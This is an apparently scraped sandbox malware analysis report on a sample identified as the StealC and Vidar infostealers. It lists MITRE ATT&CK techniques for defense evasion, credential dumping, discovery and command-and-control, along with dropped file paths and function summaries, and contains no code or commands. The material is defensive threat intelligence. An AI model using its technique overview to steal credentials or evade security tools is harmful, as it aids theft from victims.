Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AAEBAFBGIDHCBFHIECFCBGHIEG

C:\ProgramData\AEBAKJDG

C:\ProgramData\CGIDHIIJKEBGHJJKFIDA

C:\ProgramData\FBKFCFBFIDGCGDHJDBKFHCFBGI

C:\ProgramData\FIDHIEBA

C:\ProgramData\HJKJEHJKJEBGHJJKEBGI

C:\ProgramData\IIJJDGHJKKJEBFHJDBGHDBKFIE

C:\ProgramData\JKJECBAAAFHIIEBFCBKF

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

Windows Analysis Report
file.exe

Function 003D9860 Relevance: 84.2, APIs: 33, Strings: 15, Instructions: 212
libraryloaderCOMMON

Function 003C45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 003CBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 6C5835A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Function 003D4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 003D9C10 Relevance: 254.4, APIs: 112, Strings: 33, Instructions: 684
libraryloaderCOMMON

Function 003C7710 Relevance: 100.3, APIs: 54, Strings: 3, Instructions: 584
stringmemoryCOMMON

Function 003D0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Function 003C5100 Relevance: 49.6, APIs: 19, Strings: 9, Instructions: 572
stringnetworkmemoryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre